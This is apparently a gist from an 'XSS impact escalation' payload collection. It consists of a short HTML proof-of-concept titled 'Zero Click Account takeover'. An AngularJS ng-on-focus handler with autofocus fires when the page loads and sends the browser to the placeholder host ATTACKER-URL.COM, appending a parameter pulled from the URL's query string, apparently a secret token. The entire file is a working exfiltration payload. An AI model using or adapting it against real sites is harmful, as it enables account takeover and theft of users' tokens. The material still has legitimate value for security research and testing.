@1dayluo
Created November 2, 2023 06:11
Payload collection - XSS impact escalation series
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Zero Click Account takeover</title>
<meta name="description" content="" />
<meta name="viewport" content="width=device-width" />
<base href="/" />
<script src="lib/socket.io.min.js"></script>
</head>
<body>
<script src="scripts/vendor-31****a1.js"></script>
<div ng-app="" ng-init="">
<input ng-on-focus="$event.view.location = 'https://ATTACKER-URL.COM/' %2b $event.view.location.search.slice(1).split('%26')[2].split('=')[1]" autofocus />
</div>
</body>
</html>